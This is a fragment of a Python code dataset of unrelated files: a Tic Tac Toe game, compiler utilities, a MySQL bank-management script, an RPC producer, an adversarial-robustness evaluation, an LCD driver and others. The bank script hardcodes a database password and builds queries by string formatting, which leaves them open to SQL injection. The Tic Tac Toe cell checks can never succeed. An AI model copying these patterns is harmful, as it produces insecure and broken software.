1\n","sub_path":"src/sqlfluff/rules/L035.py","file_name":"L035.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"278916559","text":"from tpge import *\r\n\r\nMAX_TURNS = 10\r\nNUM_OF_TURNS = 0\r\nWHOSE_TURN = 'null'\r\nCell = 'null'\r\nTOP_LEFT = 0\r\nTOP_MIDDLE = 1\r\nTOP_RIGHT = 2\r\nMIDDLE_LEFT = 3\r\nMIDDLE_MIDDLE = 4\r\nMIDDLE_RIGHT = 5\r\nBOTTOM_LEFT = 6\r\nBOTTOM_MIDDLE = 7\r\nBOTTOM_RIGHT = 8\r\n\r\ndef initial_state():\r\n \"\"\"\r\n initial_state : State\r\n Returns the initial state of the game which is the list \r\n [[X cells], [O cells]].\r\n \"\"\"\r\n return [[],[]]\r\n\r\ndef successor_state(S, P):\r\n \"\"\"\r\n successor_state : State x Point -> State\r\n If S is a state and P is a Point, then successor_state(S,P) is the State\r\n obtained by clicking on P in S.\r\n \"\"\"\r\n\r\n TURN = NUM_OF_TURNS\r\n Cell = 'null'\r\n \r\n if in_top_left_cell(P):\r\n Cell = TOP_LEFT\r\n elif in_top_middle_cell(P):\r\n Cell = TOP_MIDDLE\r\n elif in_top_right_cell(P):\r\n Cell = TOP_RIGHT\r\n elif in_middle_left_cell(P):\r\n Cell = MIDDLE_LEFT\r\n elif in_middle_middle_cell(P):\r\n Cell = MIDDLE_MIDDLE\r\n elif in_middle_right_cell(P):\r\n Cell = MIDDLE_RIGHT\r\n elif in_bottom_left_cell(P):\r\n Cell = BOTTOM_LEFT\r\n elif in_bottom_middle_cell(P):\r\n Cell = BOTTOM_MIDDLE\r\n elif in_bottom_right_cell(P):\r\n Cell = BOTTOM_RIGHT\r\n\r\n if TURN % 2 == 0:\r\n S[0].append(Cell)\r\n else:\r\n S[1].append(Cell)\r\n\r\n TURN += TURN\r\n return S\r\n\r\ndef game_over(State):\r\n \"\"\"\r\n game_over : State -> Boolean\r\n If S is a State, then game_over(S) is True if and only if the maximum\r\n number of turns has been reached in S.\r\n \"\"\"\r\n return NUM_OF_TURNS == MAX_TURNS\r\n\r\ndef images(S):\r\n \"\"\"\r\n images : State -> Image List\r\n If S is a State, then images(S) is the list of Images that need to be\r\n drawn to the screen in order to present the state S to the user. For\r\n this game the images that need to be drawn are the background and\r\n the contents of the cells.\r\n \"\"\"\r\n return background() + contents(S)\r\n\r\ndef game_title():\r\n \"\"\"\r\n game_title : String\r\n Returns the name of the game which is \"TPGE DEMO\".\r\n \"\"\"\r\n return \"Tic Tac Toe\"\r\n\r\ndef background():\r\n \"\"\"\r\n background : Image List\r\n Returns the Image List needed to display the background for the game.\r\n \"\"\"\r\n LEFT_BORDER = (170, 400, 170, 100)\r\n MIDDLE_RIGHT_BORDER = (370, 400, 370, 100)\r\n MIDDLE_LEFT_BORDER = (270, 400, 270, 100)\r\n RIGHT_BORDER = (470, 400, 470, 100)\r\n TOP_BORDER = (170, 400, 470, 400)\r\n MIDDLE_TOP_BORDER = (170, 300, 470, 300)\r\n MIDDLE_BOTTOM_BORDER = (170, 200, 470, 200)\r\n BOTTOM_BORDER = (170, 100, 470, 100)\r\n return [LEFT_BORDER, MIDDLE_LEFT_BORDER, MIDDLE_RIGHT_BORDER, RIGHT_BORDER, TOP_BORDER, MIDDLE_TOP_BORDER, MIDDLE_BOTTOM_BORDER, BOTTOM_BORDER]\r\n\r\ndef contents(S):\r\n \"\"\"\r\n contents : State -> Image List\r\n If S is a state, then contents(S) is the list of Images needed to\r\n draw the contents of the cells in S.\r\n \"\"\"\r\n NUM_OF_TURNS = 0\r\n TURN = NUM_OF_TURNS\r\n TicTacToeContents = []\r\n if TURN % 2 == 0:\r\n WHOSE_TURN == 'X'\r\n TicTacToeContents.append([\"X's turn\",300,500,15])\r\n\r\n if Cell == TOP_LEFT:\r\n TicTacToeContents.append([170,400,270,300])\r\n TicTacToeContents.append([270,400,170,300])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == TOP_MIDDLE:\r\n TicTacToeContents.append([270,400,370,300])\r\n TicTacToeContents.append([370,400,270,300])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == TOP_RIGHT:\r\n TicTacToeContents.append([370,400,470,300])\r\n TicTacToeContents.append([470,400,370,300])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_LEFT:\r\n TicTacToeContents.append([170,300,270,200])\r\n TicTacToeContents.append([270,300,170,200])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_MIDDLE:\r\n TicTacToeContents.append([270,300,370,200])\r\n TicTacToeContents.append([370,300,270,200])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_RIGHT:\r\n TicTacToeContents.append([370,300,470,200])\r\n TicTacToeContents.append([470,300,370,200])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_LEFT:\r\n TicTacToeContents.append([170,200,270,100])\r\n TicTacToeContents.append([270,200,170,100])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_MIDDLE:\r\n TicTacToeContents.append([270,200,370,100])\r\n TicTacToeContents.append([370,200,270,100])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_RIGHT:\r\n TicTacToeContents.append([370,200,470,100])\r\n TicTacToeContents.append([470,200,370,100])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n \r\n elif TURN % 2 == 1:\r\n WHOSE_TURN == 'O'\r\n TicTacToeContents.append([\"O's turn\",300,500,15])\r\n\r\n if Cell == TOP_LEFT:\r\n TicTacToeContents.append([220,350,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == TOP_MIDDLE:\r\n TicTacToeContents.append([320,350,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == TOP_RIGHT:\r\n TicTacToeContents.append([420,350,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_LEFT:\r\n TicTacToeContents.append([220,250,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_MIDDLE:\r\n TicTacToeContents.append([320,250,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == MIDDLE_RIGHT:\r\n TicTacToeContents.append([420,250,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_LEFT:\r\n TicTacToeContents.append([220,150,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_MIDDLE:\r\n TicTacToeContents.append([320,150,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n if Cell == BOTTOM_RIGHT: \r\n TicTacToeContents.append([420,150,20])\r\n NUM_OF_TURNS += NUM_OF_TURNS\r\n\r\n print (TicTacToeContents)\r\n return TicTacToeContents\r\n\r\ndef in_top_left_cell(P):\r\n \"\"\"\r\n in_left_cell : Point -> Boolean\r\n If P is a point, then in_top_left_cell(P) is True if and only if P\r\n is within the top left cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 170 <= X <= 270 and 400 <= Y <= 300\r\n\r\ndef in_top_middle_cell(P):\r\n \"\"\"\r\n in_top_middle_cell : Point -> Boolean\r\n If P is a point, then in_top_middle_cell(P) is True if and only if P\r\n is within the top middle cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 270 <= X <= 370 and 400 <= Y <= 300\r\n\r\ndef in_top_right_cell(P):\r\n \"\"\"\r\n in_top_right_cell : Point -> Boolean\r\n If P is a point, then in_top_right_cell(P) is True if and only if P\r\n is within the top right cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 370 <= X <= 470 and 400 <= Y <= 300\r\n\r\ndef in_middle_left_cell(P):\r\n \"\"\"\r\n in_middle_left_cell : Point -> Boolean\r\n If P is a point, then in_middle_left_cell(P) is True if and only if P\r\n is within the middle left cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 170 <= X <= 270 and 300 <= Y <= 200\r\n\r\ndef in_middle_middle_cell(P):\r\n \"\"\"\r\n in_middle_middle_cell : Point -> Boolean\r\n If P is a point, then in_middle_middle_cell(P) is True if and only if P\r\n is within the center cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 270 <= X <= 370 and 300 <= Y <= 200\r\n\r\ndef in_middle_right_cell(P):\r\n \"\"\"\r\n in_middle_right_cell : Point -> Boolean\r\n If P is a point, then in_middle_right_cell(P) is True if and only if P\r\n is within the middle right cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 370 <= X <= 470 and 300 <= Y <= 200\r\n\r\ndef in_bottom_left_cell(P):\r\n \"\"\"\r\n in_bottom_left_cell : Point -> Boolean\r\n If P is a point, then in_bottom_left_cell(P) is True if and only if P\r\n is within the bottom left cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 170 <= X <= 270 and 200 <= Y <= 100\r\n\r\ndef in_bottom_middle_cell(P):\r\n \"\"\"\r\n in_bottom_middle_cell : Point -> Boolean\r\n If P is a point, then in_bottom_middle_cell(P) is True if and only if P\r\n is within the bottom middle cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 270 <= X <= 370 and 200 <= Y <= 100\r\n\r\ndef in_bottom_right_cell(P):\r\n \"\"\"\r\n in_bottom_right_cell : Point -> Boolean\r\n If P is a point, then in_bottom_right_cell(P) is True if and only if P\r\n is within the bottom right cell.\r\n \"\"\"\r\n (X,Y) = P\r\n return 370 <= X <= 470 and 200 <= Y <= 100\r\n\r\nif __name__ == \"__main__\":\r\n run_game(game_title, initial_state, successor_state, game_over, images)\r\n\r\n","sub_path":"Tic Tac Toe.py","file_name":"Tic Tac Toe.py","file_ext":"py","file_size_in_byte":8669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335521605","text":"from __future__ import print_function\nimport sys\nfrom .deferred import Deferred\n\ndef encodeBinRaw(isBin, raw, link_address):\n\tif isBin:\n\t\theader = [\n\t\t\tlink_address & 0xFF,\n\t\t\tlink_address >> 8,\n\t\t\tlen(raw) & 0xFF,\n\t\t\tlen(raw) >> 8\n\t\t]\n\telse:\n\t\theader = []\n\n\tif sys.version_info[0] == 2:\n\t\t# Python 2\n\t\treturn \"\".join([chr(char) for char in header + raw])\n\telse:\n\t\t# Python 3\n\t\treturn bytes(header + raw)\n\n\ndef int8ToUint8(int8):\n\tif isinstance(int8, Deferred):\n\t\treturn Deferred.If(\n\t\t\tint8 < 0,\n\t\t\tint8 + 256,\n\t\t\tint8\n\t\t)\n\telse:\n\t\tif int8 < 0:\n\t\t\treturn int8 + 256\n\t\telse:\n\t\t\treturn int8\n\n\n\ndef octal(n):\n\t# Compatible with Python 2 and Python 3\n\treturn oct(int(n))[1:].replace(\"o\", \"\")\n\n\nerror_mode_sublime = False\n\ndef raiseSyntaxError(file, line, column, stack=[], error=None):\n\tif error_mode_sublime:\n\t\tprint(\"{file}:::{line}:::{column}:::{error}\".format(\n\t\t\tfile=file,\n\t\t\tline=line,\n\t\t\tcolumn=column,\n\t\t\terror=error\n\t\t))\n\telse:\n\t\tprint(\"Syntax error\")\n\t\tif error is not None:\n\t\t\tprint(error)\n\t\tprint(\" at file\", file, \"(line {line}, column {column})\".format(line=line, column=column))\n\t\tfor stage in stack:\n\t\t\tprint(\" at\", stage)\n\traise SystemExit(1)\n\ndef raiseCompilerError(text, coords):\n\tif error_mode_sublime:\n\t\tprint(\"{file}:::{line}:::{column}:::{error}\".format(\n\t\t\tfile=coords[\"file\"],\n\t\t\tline=coords[\"line\"],\n\t\t\tcolumn=coords[\"column\"],\n\t\t\terror=text\n\t\t))\n\telse:\n\t\tprint(text)\n\t\tprint(\" at file {file} (line {line}, column {column})\".format(\n\t\t\tfile=coords[\"file\"],\n\t\t\tline=coords[\"line\"],\n\t\t\tcolumn=coords[\"column\"]\n\t\t))\n\t\tprint()\n\t\tprint(coords[\"text\"])\n\traise SystemExit(1)\n\ndef raiseExpressionEvaluateError(file, line, column, text):\n\tif error_mode_sublime:\n\t\tprint(\"{file}:::{line}:::{column}:::{error}\".format(\n\t\t\tfile=file,\n\t\t\tline=line,\n\t\t\tcolumn=column,\n\t\t\terror=text\n\t\t))\n\telse:\n\t\tprint(text)\n\t\tprint(\" at file {file} (line {line}, column {column})\".format(\n\t\t\tfile=file,\n\t\t\tline=line,\n\t\t\tcolumn=column\n\t\t))\n\traise SystemExit(1)\n\ndef setErrorMode(sublime=True):\n\tglobal error_mode_sublime\n\terror_mode_sublime = sublime","sub_path":"compiler/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"278193745","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport argparse\nimport numpy as np\nfrom six.moves import cPickle\nimport random\nimport tensorflow as tf\nimport time\n\nfrom model import Model\n\n\ndef main():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument('--save_dir', type=str, default='save',\n help='model directory to store checkpointed models')\n parser.add_argument('--word', type=str, default=u'apfelbrothauskirche',\n help='word for splitting')\n parser.add_argument('--count', type=int, default=10,\n help='count of words for test')\n parser.add_argument('--device', type=str, default='/gpu:0',\n help='device')\n args = parser.parse_args()\n sample(args)\n\n\ndef sample(args):\n timer = time.time()\n with open(os.path.join(args.save_dir, 'config.pkl'), 'rb') as f:\n saved_args = cPickle.load(f)\n with open(os.path.join(args.save_dir, 'chars_vocab.pkl'), 'rb') as f:\n chars, vocab = cPickle.load(f)\n model = Model(saved_args, infer=True)\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n saver = tf.train.Saver(tf.global_variables())\n ckpt = tf.train.get_checkpoint_state(args.save_dir)\n if ckpt and ckpt.model_checkpoint_path:\n\n def same_prefix(splitted, real, prefix_len=3):\n for i in range(len(real)):\n try:\n if splitted[i][:prefix_len].lower() != real[i][:prefix_len].lower():\n return False\n except IndexError:\n return False\n return True\n\n saver.restore(sess, ckpt.model_checkpoint_path)\n k = 0\n COUNT = 20\n random.seed()\n randlist = []\n for i in range(args.count):\n # need to switch 66206 to sum(1 for line in f)\n randlist.append(random.randint(0, 66206))\n with open('data/compounds.txt', encoding='utf-8') as f:\n for i, line in enumerate(f):\n if i in randlist:\n words = line.split(' ')\n words[-1] = words[-1][:-1]\n # if not ' ' in words[0]:\n splitted = model.smash(sess, vocab, words[0].lower())\n print(splitted)\n print(words[1:])\n if same_prefix(splitted, words[1:]):\n k += 1\n print(k / args.count)\n\n print(time.time() - timer, 'seconds for test')\n\nif __name__ == '__main__':\n main()\n","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169135017","text":"import mysql.connector\r\nmydb = mysql.connector.connect(host='localhost',user='root',password='9975696628',database='BANK_MANAGEMENT')\r\n\r\ndef OpenAcc():\r\n n=input(\"Enter The Name: \")\r\n n=n.title()\r\n\r\n ac=input(\"Enter The Account No: \")\r\n db=input(\"Enter The Date of Birth: \")\r\n add=input(\"Enter The Address: \")\r\n # try:\r\n # cn=int(input(\"Enter The Contact Number: \"))\r\n # cn = str(cn)\r\n # except:\r\n # print(\"Contact number should be in digits\")\r\n # cn=input(\"Enter The Contact Number: \")\r\n cn=input(\"Enter The Contact Number: \")\r\n ob=int(input(\"Enter The Account Balance: \"))\r\n data1=(n,ac,db,add,cn,ob)\r\n data2=(n,ac,ob)\r\n sql1='insert into account values (%s,%s,%s,%s,%s,%s)' \r\n sql2='insert into amount values (%s,%s,%s)'\r\n x=mydb.cursor()\r\n x.execute(sql1,data1)\r\n x.execute(sql2,data2)\r\n mydb.commit()\r\n print(\"Data Entered Succesfully\")\r\n main()\r\n\r\ndef DespoAmo():\r\n amount= input(\"Enter the amount you want to deposit: \")\r\n ac=input(\"Enter The Account No: \")\r\n a = 'select balance from amount where Accno=%s'\r\n data=(ac,)\r\n x=mydb.cursor()\r\n x.execute(a% data)\r\n result=x.fetchone()\r\n t=result[0] + int(amount)\r\n sql=('update amount set Balance=%s where AccNo=%s')\r\n d=(t,ac)\r\n x.execute(sql, d) \r\n mydb.commit()\r\n main()\r\n\r\ndef WithdrawAmount():\r\n amount=input(\"Enter the amount you want to withdraw: \")\r\n ac = input(\"Enter The Account No: \")\r\n a='select balance from amount where Accno=%s'\r\n data=(ac,)\r\n x=mydb.cursor()\r\n x.execute(a%data)\r\n result=x.fetchone()\r\n t=result[0]-float(amount)\r\n sql=('update amount set balance=%s where Accno=%s')\r\n d=(t,ac)\r\n x.execute(sql%d) \r\n mydb.commit()\r\n main()\r\n\r\ndef BalEnq():\r\n ac=input(\"Enter the account No: \")\r\n a='select * from amount where Accno=%s'\r\n data=(ac,)\r\n x=mydb.cursor()\r\n x.execute(a%data)\r\n result=x.fetchone()\r\n print(\"balance for account:\",ac,\"is\",result[-1])\r\n\r\ndef DisDetails():\r\n ac=input(\"Enter the account No: \")\r\n a='select * from account where Accno=%s'\r\n data=(ac,)\r\n x=mydb.cursor()\r\n x.execute(a%data)\r\n result=x.fetchone()\r\n for i in result:\r\n print(i)\r\n main()\r\n\r\ndef CloseAcc():\r\n ac=input(\"Enter account no: \")\r\n sql1='delete from account where Accno=%s'\r\n sql2='delete from amount where Accno=%s'\r\n data=(ac,)\r\n x=mydb.cursor()\r\n x.execute(sql1%data)\r\n x.execute(sql2%data)\r\n mydb.commit()\r\n main()\r\n\r\n\r\n\r\n \r\ndef main():\r\n print(''' \r\n 1.OPEN NEW ACCOUNT\r\n 2.DEPOSIT AMOUNT\r\n 3.WITHDRAW AMOUNT\r\n 4.BALANCE ENQUIRY\r\n 5.DISPLAY CUSTOMER DETAILS\r\n 6.CLOSE AN ACCOUNT\r\n 7.CANCEL''')\r\nchoice = 0\r\nwhile(choice != '7'):\r\n choice = input(\"Enter the operation you want to perform : \")\r\n if (choice=='1'):\r\n OpenAcc() \r\n elif(choice=='2'):\r\n DespoAmo() \r\n elif(choice=='3'):\r\n WithdrawAmount() \r\n elif(choice=='4'):\r\n BalEnq()\r\n elif(choice=='5'):\r\n DisDetails()\r\n elif(choice=='6'):\r\n CloseAcc()\r\n else:\r\n print(\"Invalid Choice\")","sub_path":"bank management final.py","file_name":"bank management final.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"329244076","text":"from kombu import Connection, Producer, Queue, Consumer, Message\nfrom typing import Callable\n\n\nclass RPCProducer:\n \"\"\"\n This class will begin an RPC and process the received response\n \"\"\"\n\n def __init__(self, connection_string: str, routing: str, callback: Callable[[dict, Message], None] = None):\n from src.service.template.mq.mq import make_basic_exchange\n self.exchange = make_basic_exchange(\"rpc\")\n self.conn = Connection(connection_string)\n self.routing = routing\n self.callback = callback\n self.reply_queue = Queue(name=\"amq.rabbitmq.reply-to\")\n\n def call(self, payload: dict, ):\n with Consumer(self.conn, self.reply_queue, callbacks=[self.on_message], no_ack=True):\n producer = Producer(exchange=self.exchange, channel=self.conn, routing_key=self.routing)\n properties = {\n \"reply_to\": \"amq.rabbitmq.reply-to\",\n }\n producer.publish(payload, **properties)\n self.conn.drain_events()\n\n def on_message(self, body: dict, message: Message):\n callback_function = self.default_callback\n if self.callback is not None:\n callback_function = self.callback\n callback_function(body, message)\n message.ack()\n\n @staticmethod\n def default_callback(body, message: Message):\n print(\"RPC Response:\\n%s\" % body)\n","sub_path":"src/service/template/mq/rpc/rpc_producer.py","file_name":"rpc_producer.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"73850487","text":"#!./env python\n\n# from autoattack import AutoAttack\nimport torch\nimport numpy as np\nimport os\nimport argparse\n\nimport torchvision.datasets as datasets\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\n\nfrom src.adversary import AAAttacker\nfrom src.utils import get_net, str2bool\n\ndef robust_certify(model, depth, width, model_parallel=False, normalize=True,\n path='.', state='last', gpu_id='0', # sample=1000, seed=7,\n mode='standard',\n data_dir='/home/chengyu/RobustDataProfiling/data'):\n\n ## Current setting: evaluate on a random subset of 1000 (fixed during training)\n ## Fast setting for epoch-wise evaluation: same as above but use agpd-t only\n ## Leaderboard evalulation setting: n_ex=10000, i.e. use the entire testset\n\n # standard: all four attack, entire test set\n # fast: first two attack, entire test set\n assert(mode in ['standard', 'fast'])\n\n print('>>>>>>>>>>> set environment..')\n os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\n os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n print('>>>>>>>>>>> get net..')\n if state == 'last':\n model_state = 'model.pt'\n elif state == 'best':\n model_state = 'best_model.pt'\n else:\n raise KeyError(state)\n\n log_path = 'log_certify_%s' % state\n if mode != 'standard':\n log_path += '_%s' % mode\n log_path += '.txt'\n\n net = get_net(path,\n num_classes=10,\n n_channel=3,\n feature=None,\n model=model,\n depth=depth,\n width=width,\n state=model_state,\n parallel=model_parallel,\n device=device)\n\n print('>>>>>>>>>>> start evaluating..')\n attacker = AAAttacker(net=net,\n normalize=normalize,\n mode=mode,\n path=path,\n log_path=log_path,\n device=device,\n data_dir=data_dir)\n attacker.evaluate()\n\n print('>>>>>>>>>>> Done.')\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-m', \"--model\", default='resnet', type=str, help='model')\n parser.add_argument('--depth', default=20, type=int, help='model depth')\n parser.add_argument('--width', default=64, type=int, help='model width')\n parser.add_argument(\"-mp\", \"--model-parallel\", type=str2bool, nargs='?', const=True, default=False, help=\"model parallel?\")\n parser.add_argument(\"--norm\", type=str2bool, nargs='?', const=True, default=False, help=\"normalized inputs?\")\n parser.add_argument(\"-p\", \"--path\", type=str, help=\"model path\")\n parser.add_argument('-d', \"--state\", default='last', type=str, help='model state')\n parser.add_argument(\"-g\", \"--gpu\", default='0', type=str, help=\"gpu_id\")\n parser.add_argument(\"--mode\", default='standard', type=str, help=\"eval mode\")\n args = parser.parse_args()\n\n print(args.model_parallel)\n\n robust_certify(model=args.model, depth=args.depth, width=args.width, model_parallel=args.model_parallel, normalize=args.norm,\n path=args.path, state=args.state, gpu_id=args.gpu, mode=args.mode)\n","sub_path":"robustCertify.py","file_name":"robustCertify.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"333336183","text":"'''\npython-periphery 1602 LCD sample\n\nI ported from here\nhttps://www.raspberrypi-spy.co.uk/2012/07/16x2-lcd-module-control-using-python/\n\n'''\n#!/usr/bin/python\n#-*- encoding: utf-8 -*-\n#import\nfrom periphery import GPIO\nimport time\n\n# Define GPIO to LCD mapping\nGPIO.LCD_RS = GPIO(101, \"out\")\nGPIO.LCD_E = GPIO(121, \"out\")\nGPIO.LCD_D4 = GPIO(122, \"out\")\nGPIO.LCD_D5 = GPIO(123, \"out\")\nGPIO.LCD_D6 = GPIO(124, \"out\")\nGPIO.LCD_D7 = GPIO(125, \"out\")\n\n# Define some device constants\nLCD_WIDTH = 16 # Maximum characters per line\nLCD_CHR = True\nLCD_CMD = False\n\nLCD_LINE_1 = 0x80 # LCD RAM address for the 1st line\nLCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line\n\n# Timing constants\nE_PULSE = 0.0005\nE_DELAY = 0.0005\n\ndef main():\n # Main program block\n# GPIO_setwarnings(False)\n# GPIO_setmode(GPIO_BCM) # Use BCM GPIO numbers\n# GPIO_setup(LCD_E, GPIO_OUT) # E\n# GPIO_setup(LCD_RS, GPIO_OUT) # RS\n# GPIO_setup(LCD_D4, GPIO_OUT) # DB4\n# GPIO_setup(LCD_D5, GPIO_OUT) # DB5\n# GPIO_setup(LCD_D6, GPIO_OUT) # DB6\n# GPIO_setup(LCD_D7, GPIO_OUT) # DB7\n\n # Initialise display\n lcd_init()\n\n while True:\n\n # Send some test\n lcd_string(\"OrangePi 2G-IOT\",LCD_LINE_1)\n lcd_string(\"16x2 LCD Test\",LCD_LINE_2)\n\n time.sleep(3) # 3 second delay\n\n # Send some text\n lcd_string(\"1234567890123456\",LCD_LINE_1)\n lcd_string(\"abcdefghijklmnop\",LCD_LINE_2)\n\n time.sleep(3) # 3 second delay\n\ndef lcd_init():\n # Initialise display\n lcd_byte(0x33,LCD_CMD) # 110011 Initialise\n lcd_byte(0x32,LCD_CMD) # 110010 Initialise\n lcd_byte(0x06,LCD_CMD) # 000110 Cursor move direction\n lcd_byte(0x0C,LCD_CMD) # 001100 Display On,Cursor Off, Blink Off\n lcd_byte(0x28,LCD_CMD) # 101000 Data length, number of lines, font size\n lcd_byte(0x01,LCD_CMD) # 000001 Clear display\n time.sleep(E_DELAY)\n\ndef lcd_byte(bits, mode):\n # Send byte to data pins\n # bits = data\n # mode = True for character\n # False for command\n\n GPIO.LCD_RS.write(mode) # RS\n\n # High bits\n GPIO.LCD_D4.write(False)\n GPIO.LCD_D5.write(False)\n GPIO.LCD_D6.write(False)\n GPIO.LCD_D7.write(False)\n if bits&0x10==0x10:\n GPIO.LCD_D4.write(True)\n if bits&0x20==0x20:\n GPIO.LCD_D5.write(True)\n if bits&0x40==0x40:\n GPIO.LCD_D6.write(True)\n if bits&0x80==0x80:\n GPIO.LCD_D7.write(True)\n\n # Toggle 'Enable' pin\n lcd_toggle_enable()\n\n # Low bits\n GPIO.LCD_D4.write(False)\n GPIO.LCD_D5.write(False)\n GPIO.LCD_D6.write(False)\n GPIO.LCD_D7.write(False)\n if bits&0x01==0x01:\n GPIO.LCD_D4.write(True)\n if bits&0x02==0x02:\n GPIO.LCD_D5.write(True)\n if bits&0x04==0x04:\n GPIO.LCD_D6.write(True)\n if bits&0x08==0x08:\n GPIO.LCD_D7.write(True)\n\n # Toggle 'Enable' pin\n lcd_toggle_enable()\n\ndef lcd_toggle_enable():\n # Toggle enable\n time.sleep(E_DELAY)\n GPIO.LCD_E.write(True)\n time.sleep(E_PULSE)\n GPIO.LCD_E.write(False)\n time.sleep(E_DELAY)\n\ndef lcd_string(message,line):\n # Send string to display\n\n message = message.ljust(LCD_WIDTH,\" \")\n\n lcd_byte(line, LCD_CMD)\n\n for i in range(LCD_WIDTH):\n lcd_byte(ord(message[i]),LCD_CHR)\n\nif __name__ == '__main__':\n\n try:\n main()\n except KeyboardInterrupt:\n pass\n finally:\n lcd_byte(0x01, LCD_CMD)\n lcd_string(\"Goodbye!\",LCD_LINE_1)\n# GPIO_cleanup()\n","sub_path":"lcd.py","file_name":"lcd.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99113196","text":"### https://www.projecteuler.net/problem=58\n\nimport sys\nsys.path.append(r'..\\euler')\nimport common as euler\nimport time\n\ndef Problem58(n: float):\n ''' For a number 0 < n < 1, returns the side length\n of the square for which the proportion of primes\n along the diagonals is less than n'''\n\n # Initialise the spiral with side length 3\n start_time = time.time()\n diagonal = [1, 3, 5, 7, 9]\n side_length = 3\n prime_count = 3\n \n # Note that the ratio is not monotonically decreasing\n # However since the question asks for the first time it drops below n, this will do\n while (prime_count / len(diagonal) >= n):\n # Update the side length and step between each new number\n side_length += 2\n step = side_length - 1\n\n # At each new layer, we need to generate 4 new numbers\n # Add them to the diagonal, and to the prime counter if necessary\n for i in range(4):\n new_number = diagonal[-1] + step\n if (euler.is_prime(new_number)):\n prime_count += 1\n diagonal.append(new_number)\n \n return side_length, '%.3f s' % (time.time() - start_time)","sub_path":"Page2/Problem58.py","file_name":"Problem58.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"58732284","text":"# -*- coding: utf-8 -*-\r\nimport ast\r\nfrom odoo import models, fields, api, _\r\nfrom odoo.tools.safe_eval import safe_eval\r\nfrom datetime import datetime\r\nfrom odoo.tools import float_is_zero\r\nfrom dateutil.relativedelta import relativedelta\r\n\r\nclass AccountFinancialReportContext(models.TransientModel):\r\n _inherit = 'account.financial.html.report.context'\r\n\r\n analytic_level_id = fields.Many2one('account.analytic.level', string='Analytic Levels')\r\n\r\n @api.multi\r\n def get_columns_names(self):\r\n columns = super(AccountFinancialReportContext, self).get_columns_names()\r\n # analytic_level_id = self.env.context.get('analytic_level_id')\r\n if self.analytic_level_id:\r\n analytic_account_ids = self.env['account.analytic.account'].search([('level_id','=',self.analytic_level_id.id)])\r\n if analytic_account_ids:\r\n columns = []\r\n for analytic in analytic_account_ids:\r\n columns.append(analytic.name)\r\n return columns\r\n\r\n @api.multi\r\n def get_columns_types(self):\r\n result = super(AccountFinancialReportContext, self).get_columns_types()\r\n # analytic_level_id = self.env.context.get('analytic_level_id')\r\n if self.analytic_level_id:\r\n analytic_account_ids = self.env['account.analytic.account'].search([('level_id', '=', self.analytic_level_id.id)])\r\n if analytic_account_ids:\r\n result = ['number' for i in analytic_account_ids]\r\n return result\r\n\r\nAccountFinancialReportContext()\r\n\r\nclass AccountFinancialReportLine(models.Model):\r\n _inherit = 'account.financial.html.report.line'\r\n\r\n def _process_formulas(self):\r\n result = self._split_formulas()\r\n if result:\r\n result = result.values()[0].split(' ')\r\n else:\r\n result = []\r\n result = filter(None, result)\r\n # checking -ve 